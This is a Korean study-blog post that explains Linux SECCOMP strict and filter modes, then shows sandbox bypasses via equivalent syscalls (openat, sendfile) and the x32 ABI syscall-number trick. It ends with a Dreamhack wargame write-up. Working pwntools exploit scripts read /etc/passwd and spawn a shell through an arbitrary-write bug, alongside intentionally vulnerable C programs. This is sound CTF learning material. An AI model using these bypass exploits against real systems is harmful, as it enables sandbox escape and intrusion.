TIL: SECCOMP

September 4, 2022

SECCOMP

Sandbox

Sandbox는 외부 공격으로부터 시스템을 보호하는 기법으로, application의 기능 수행을 위해 꼭 필요한 system call 실행만을 허용한다. SECCOMP는 이 sandbox 중 하나이다.

SECCOMP

SECCOMP(Secure computing mode)는 Linux kernel에서 sandox 매커니즘을 제공하는 기능이다. 두 가지 모드를 선택해 적용하여 특정 시스템 콜만을 사용하게 할 수 있다.

STRICT_MODE

STRICT_MODE에서는 read, write, exit, sigreturn system call만을 호출하고, 이외의 system call 요청이 들어오면 SIGKILL signal을 발생하고 프로그램을 종료한다.

prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);를 실행해 설정할 수 있다.

작동 원리

static const int mode1_syscalls[] = {
    __NR_seccomp_read,
    __NR_seccomp_write,
    __NR_seccomp_exit,
    __NR_seccomp_sigreturn,
    -1, /* negative terminated */
};
#ifdef CONFIG_COMPAT
static int mode1_syscalls_32[] = {
    __NR_seccomp_read_32,
    __NR_seccomp_write_32,
    __NR_seccomp_exit_32,
    __NR_seccomp_sigreturn_32,
    0, /* null terminated */
};
#endif
static void __secure_computing_strict(int this_syscall) {
  const int *allowed_syscalls = mode1_syscalls;
#ifdef CONFIG_COMPAT
  if (in_compat_syscall()) allowed_syscalls = get_compat_mode1_syscalls();
#endif
  do {
    if (*allowed_syscalls == this_syscall) return;
  } while (*++allowed_syscalls != -1);
#ifdef SECCOMP_DEBUG
  dump_stack();
#endif
  seccomp_log(this_syscall, SIGKILL, SECCOMP_RET_KILL_THREAD, true);
  do_exit(SIGKILL);
}

STRICT_MODE를 처리하는 코드의 일부이다.

전달된 system call 번호(this_syscall)가 model_syscalls 또는 model_syscalls_32에 미리 정의된 번호와 일치하는지 검사한다.
일치하지 않는다면 SIGKILL를 전달하고 프로그램을 종료한다.

FILTER_MODE

FILTER_MODE에서는 원하는 system call의 호출을 허용하거나 거부할 수 있다. library 함수를 이용하거나 BPF(Berkeley Packet Filter) 문법을 통해 적용할 수 있다.

라이브러리 함수 사용

seccomp_init: SECCOMP 모드의 기본 값을 설정한다.
seccomp_rule_add: SECCOMP의 규칙을 추가한다.
seccomp_load: 앞서 적용한 규칙을 application에 반영한다.

ALLOW LIST

  void sandbox() {
    scmp_filter_ctx ctx;
    ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
      printf("seccomp error\n");
      exit(0);
    }
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(rt_sigreturn), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(openat), 0);
    seccomp_load(ctx);
  }

SCMP_ACT_KILL를 이용해 모든 system call의 허용을 우선 금지한다.
이후 seccomp_rule_add를 이용해 사용을 허용할 system call만 허용하는 코드를 적고, seccomp_load로 규칙을 적용한다.

DENY LIST

  void sandbox() {
    scmp_filter_ctx ctx;
    ctx = seccomp_init(SCMP_ACT_ALLOW);
    if (ctx == NULL) {
      exit(0);
    }
    seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(openat), 0);
    seccomp_load(ctx);
  }

SCMP_ACT_ALLOW로 모든 system call을 허용한다.
seccomp_rule_add로 특정 system call의 호출을 금지한다.

BPF 사용

BPF는 kernel에서 지원하는 virtual machine으로, 임의 데이터를 비교하고 결과에 따라 특정 구문으로 분기하는 명령어를 제공한다.

예시 코드

#define ALLOW_SYSCALL(name)                               \
  BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, __NR_##name, 0, 1), \
      BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_ALLOW)
#define KILL_PROCESS BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_KILL)
#define syscall_nr (offsetof(struct seccomp_data, nr))
#define arch_nr (offsetof(struct seccomp_data, arch))
/* architecture x86_64 */
#define ARCH_NR AUDIT_ARCH_X86_64
int sandbox() {
  struct sock_filter filter[] = {
      /* Validate architecture. */
      BPF_STMT(BPF_LD + BPF_W + BPF_ABS, arch_nr),
      BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, ARCH_NR, 1, 0),
      BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_KILL),
      /* Get system call number. */
      BPF_STMT(BPF_LD + BPF_W + BPF_ABS, syscall_nr),
      /* List allowed syscalls. */
      ALLOW_SYSCALL(rt_sigreturn),
      ALLOW_SYSCALL(open),
      ALLOW_SYSCALL(openat),
      ALLOW_SYSCALL(read),
      ALLOW_SYSCALL(write),
      ALLOW_SYSCALL(exit_group),
      KILL_PROCESS,
  };
  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
      .filter = filter,
  };
  if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1) {
    perror("prctl(PR_SET_NO_NEW_PRIVS)\n");
    return -1;
  }
  if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) == -1) {
    perror("Seccomp filter error\n");
    return -1;
  }
  return 0;
}

seccomp-tools

seccomp-tools는 복잡한 SECCOMP 규칙이 적용된 binary의 분석을 돕는 tool이다.

seccomp-tools dump ./bypass_seccomp 
 line  CODE  JT   JF      K
=================================
0x20 0x00 0x00 0x00000004  A = arch
0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
0x20 0x00 0x00 0x00000000  A = sys_number
0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
0x15 0x00 0x05 0xffffffff  if (A != 0xffffffff) goto 0010
0x15 0x04 0x00 0x00000001  if (A == write) goto 0010
0x15 0x03 0x00 0x00000002  if (A == open) goto 0010
0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0010
0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0010
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x06 0x00 0x00 0x00000000  return KILL

위와 같이 binary에 적용된 SECCOMP 규칙을 살펴볼 수 있다.

Bypass SECCOMP - 같은 기능을 하는 system call 사용하기

#include <fcntl.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <unistd.h>
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
void sandbox() {
  scmp_filter_ctx ctx;
  ctx = seccomp_init(SCMP_ACT_ALLOW);
  if (ctx == NULL) {
    exit(0);
  }
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(open), 0);
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execveat), 0);
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(write), 0);
  seccomp_load(ctx);
}
int main(int argc, char *argv[]) {
  void *shellcode = mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  void (*sc)();
  init();
  memset(shellcode, 0, 0x1000);
  printf("shellcode: ");
  read(0, shellcode, 0x1000);
  sandbox();
  sc = (void *)shellcode;
  sc();
}

위 코드는 rwx 권한이 있는 페이지를 할당하고, 입력받은 shellcode를 실행한다.

seccomp-tools 결과

seccomp-tools dump ./bypass_seccomp 
 line  CODE  JT   JF      K
=================================
0x20 0x00 0x00 0x00000004  A = arch
0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
0x20 0x00 0x00 0x00000000  A = sys_number
0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
0x15 0x00 0x05 0xffffffff  if (A != 0xffffffff) goto 0010
0x15 0x04 0x00 0x00000001  if (A == write) goto 0010
0x15 0x03 0x00 0x00000002  if (A == open) goto 0010
0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0010
0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0010
0x06 0x00 0x00 0x7fff0000  return ALLOW
0x06 0x00 0x00 0x00000000  return KILL

sandbox는 exeve, execveat, write, open을 실행하지 못하게 한다.

같은 기능을 하는 system all 찾기

제한된 system call들과 같은 기능을 하는 다른 system call을 찾아본다.

open은 파일을 열기 위한 system call로, openat이라는 system call이 같은 역할을 수행할 수 있다.

int openat(int dirfd, const char *pathname, int flags, mode_t mode);

두 번째 인자인 pathname이 절대 경로일 경우 openat은 dirfd를 무시하므로, 이를 통해 원하는 파일의 내용을 읽을 수 있다.

write은 읽은 내용을 출력하기 위한 system call로, sendfile이 같은 역할을 수행할 수 있다.

ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);

읽을 파일의 FD를 in_fd에 넣고, STDOUT을 out_fd에 넣으면 파일의 내용을 출력할 수 있다. count만큼 파일을 전송하므로 이 값을 읽고자 하는 파일의 크기보다 크게 설정해주어야 한다.

Exploit

따라서 위 두 시스템 콜을 사용한 exploit code는 아래와 같다.

from pwn import *
context.arch = 'x86_64'
p = process("./bypass_seccomp")
shellcode = shellcraft.openat(0, "/etc/passwd")
shellcode += 'mov r10, 0xffff'
shellcode += shellcraft.sendfile(1, 'rax', 0).replace("xor r10d, r10d","")
shellcode += shellcraft.exit(0)
p.sendline(asm(shellcode))
p.interactive()

mov r10, 0xffff 구문을 통해 sendfile의 count를 큰 값으로 설정한다.
shellcraft.sendfile(1, 'rax', 0)을 통해 생성된 shellcode는 xor r10d, r10d를 포함하는데, 이 부분을 제외해주어야 count값이 0이 아닌 값으로 설정되므로 replace("xor r10d, r10d", "")를 통해 이 부분을 제거한다.

Bypass SECCOMP - system call 호출 방식 이용하기

ABI

ABI(Application Binary Interface)는 두 binary program module 사이의 interface를 말한다.

우리가 사용하는 x86, x86_64 외의 다양한 아키텍처들은 명령어 세트와 기능, 크기 등이 모두 다르다. 따라서 kernel code는 이 모든 것을 고려한 코드로 작성되어 있다. 64 bit OS에서 32 bit application을 호환하는 것이 예시가 될 수 있다. 서로 다른 아키텍처들을 호환하기 위한 코드를 이용해 SECCOMP를 우회할 수 있다.

system call 호출 방식

x86-64와 x32 두 ABI는 같은 processor에서 동작한다. 또한, x86-64에서는 32 bit 명령어를 호환할 수 있다. SECCOMP를 사용할 때 architecture를 AUDIT_ARCH_X86_64로 정의된 매크로로 명시하는데, 이는 linux kernel에서 x86-64와 x32를 동시에 일컫는 아키텍처 필드명이다. 그러나 두 ABI는 명백히 다르므로 linux kernel은 이를 구별하기 위해 system call 번호에 차이를 둔다. 코드를 통해 자세히 살펴보자.

do_syscall_64

  __visible noinstr void do_syscall_64(struct pt_regs *regs, int nr)
  {
  	add_random_kstack_offset();
  	nr = syscall_enter_from_user_mode(regs, nr);
  	instrumentation_begin();
  	if (!do_syscall_x64(regs, nr) && !do_syscall_x32(regs, nr) && nr != -1) {
  		/* Invalid system call, but still a system call. */
  		regs->ax = __x64_sys_ni_syscall(regs);
  	}
  	instrumentation_end();
  	syscall_exit_to_user_mode(regs);
  }

do_syscall_64는 linux kernel에서 system call을 호출하기 위해 사용하는 함수이다.
우선 do_syscall_x64를 호출해 x86-64의 system call을 호출하고, 이 함수가 실패하면 do_syscall_x32를 호출해 x32 ABI에서 system call을 한 번 더 호출한다.

do_syscall_x64

   static __always_inline bool do_syscall_x64(struct pt_regs *regs, int nr)
  {
  	/*
  	 * Convert negative numbers to very high and thus out of range
  	 * numbers for comparisons.
  	 */
  	unsigned int unr = nr;
  	if (likely(unr < NR_syscalls)) {
  		unr = array_index_nospec(unr, NR_syscalls);
  		regs->ax = sys_call_table[unr](regs);
  		return true;
  	}
  	return false;
  }

호출하는 system call 번호가 system call의 총 갯수를 초과하는지 확인하고, 그렇지 않다면 system call을 호출한다.

do_syscall_x32

  static __always_inline bool do_syscall_x32(struct pt_regs *regs, int nr)
  {
  	/*
  	 * Adjust the starting offset of the table, and convert numbers
  	 * < __X32_SYSCALL_BIT to very high and thus out of range
  	 * numbers for comparisons.
  	 */
  	unsigned int xnr = nr - __X32_SYSCALL_BIT;
  	if (IS_ENABLED(CONFIG_X86_X32_ABI) && likely(xnr < X32_NR_syscalls)) {
  		xnr = array_index_nospec(xnr, X32_NR_syscalls);
  		regs->ax = x32_sys_call_table[xnr](regs);
  		return true;
  	}
  	return false;
  }

호출하는 system call 번호에서 __X32_SYSCALL_BIT(0x40000000)을 뺀 값을 이용해 system call을 호출한다.

정리하자면, x32 ABI를 위한 system call을 호출할 때에는 기존 system call의 번호에 0x40000000을 더한 값을 사용한다.

따라서 원하는 system call이 SECCOMP에 의해 막혀있을 경우, do_syscall_x32에서 실행할 수 있으므로 해당 시스템 콜의 번호에 0x40000000을 더한 값을 번호로 넣어 system call을 실행한다.

라이브러리 함수를 사용할 때 vs BPF를 사용할 때

라이브러리 함수를 사용할 때

0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005

seccomp-tools를 이용해 라이브러리 함수를 사용해 SECCOMP를 적용한 binary를 분석해보면, 코드에서는 정의하지 않은 비교문이 추가되어 있다.

system call 번호가 0x40000000이 넘지는 않는지 확인하는 구문이 추가되어 있으므로, 앞서 말한 방식으로 SECCOMP를 bypass할 수 없다.

BPF를 사용할 때

0003: 0x20 0x00 0x00 0x00000000  A = sys_number
0004: 0x15 0x00 0x01 0x0000000f  if (A != rt_sigreturn) goto 0006

반면 BPF를 사용했을 경우는 위와 같은 비교문이 없으므로 앞서 말한 방식의 exploit이 가능하다.

Exploit 예시

from pwn import *

context.arch = 'x86_64'
p = process("./bypass_secbpf")

data = '''
mov rax, 2
or rax, 0x40000000
lea rdi, [rip+path]
xor rsi, rsi
syscall

mov rdi, rax
mov rsi, rsp
mov rdx, 0x1000
xor rax, rax
or rax, 0x40000000
syscall

mov rdi, 1
mov rsi, rsp
mov rax, 1
or rax, 0x40000000
syscall
path: .asciz "/etc/passwd"
'''
p.sendline(asm(data))
p.interactive()

open, read, write을 실행해 /etc/passwd를 읽은 exploit code이다.
or rax, 0x40000000을 이용해 system call 번호에 0x40000000을 더해준다. → x32 모드로 system call을 호출한다.

Wargame: SECCOMP

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <linux/unistd.h>
#include <linux/audit.h>
#include <sys/mman.h>

int mode = SECCOMP_MODE_STRICT;

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

int syscall_filter() {
    #define syscall_nr (offsetof(struct seccomp_data, nr))
    #define arch_nr (offsetof(struct seccomp_data, arch))

    /* architecture x86_64 */
    #define REG_SYSCALL REG_RAX
    #define ARCH_NR AUDIT_ARCH_X86_64
    struct sock_filter filter[] = {
        /* Validate architecture. */
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS, arch_nr),
        BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ARCH_NR, 1, 0),
        BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
        /* Get system call number. */
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS, syscall_nr),
        };

    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
        };
    if ( prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1 ) {
        perror("prctl(PR_SET_NO_NEW_PRIVS)\n");
        return -1;
        }

    if ( prctl(PR_SET_SECCOMP, mode, &prog) == -1 ) {
        perror("Seccomp filter error\n");
        return -1;
        }
    return 0;
}

int main(int argc, char* argv[])
{
    void (*sc)();
    unsigned char *shellcode;
    int cnt = 0;
    int idx;
    long addr;
    long value;

    initialize();

    shellcode = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    while(1) {
        printf("1. Read shellcode\n");
        printf("2. Execute shellcode\n");
        printf("3. Write address\n");
        printf("> ");

        scanf("%d", &idx);

        switch(idx) {
            case 1:
                if(cnt != 0) {
                    exit(0);
                }

                syscall_filter();
                printf("shellcode: ");
                read(0, shellcode, 1024);
                cnt++;
                break;
            case 2:
                sc = (void *)shellcode;
                sc();
                break;
            case 3:
                printf("addr: ");
                scanf("%ld", &addr);
                printf("value: ");
                scanf("%ld", addr);
                break;
            default:
                break;
        }
    }
    return 0;
}

Vulnerability Scanning

checksec
1번 메뉴로 원하는 shellcode를 입력한 뒤 2번 메뉴로 이를 실행할 수 있다.
3번 메뉴로 arbitrary address에 write이 가능하다.
mode 전역 변수가 SECCOMP_MODE_STRICT으로 설정되어 있고, prctl을 이 mode로 실행하므로 SECCOMP이 STRICT MODE로 실행되었음을 알 수 있다.

Exploit

PIE가 적용되어 있지 않으므로 mode의 주소가 일정하다. 따라서 3번 메뉴로 mode의 값을 0으로 overwrite하여 syscall_filter가 실행되었을 때 SECCOMP이 적용되지 않도록 하고, shellcode를 실행하면 된다.

from pwn import *

#p = process("./seccomp")
p = remote("host3.dreamhack.games", 19791)
#context.terminal = ["tmux", "splitw", "-h"]
#gdb.attach(p)
context.arch = "amd64"

p.sendlineafter("> ", "3")

p.sendlineafter("addr: ", str(0x602090)) # mode의 주소
p.sendlineafter("value: ", "0")

p.sendlineafter("> ", "1")
sc = shellcraft.sh()
p.sendafter("shellcode: ", asm(sc))

p.sendlineafter("> ", "2")

p.interactive()

Share on

Twitter Facebook LinkedIn

Woohyuk Choi

TIL: SECCOMP

SECCOMP

Sandbox

SECCOMP

STRICT_MODE

작동 원리

FILTER_MODE

라이브러리 함수 사용

BPF 사용

seccomp-tools

Bypass SECCOMP - 같은 기능을 하는 system call 사용하기

seccomp-tools 결과

같은 기능을 하는 system all 찾기

Exploit

Bypass SECCOMP - system call 호출 방식 이용하기

ABI

system call 호출 방식

라이브러리 함수를 사용할 때 vs BPF를 사용할 때

Exploit 예시

Wargame: SECCOMP

Vulnerability Scanning

Exploit

Share on

Leave a comment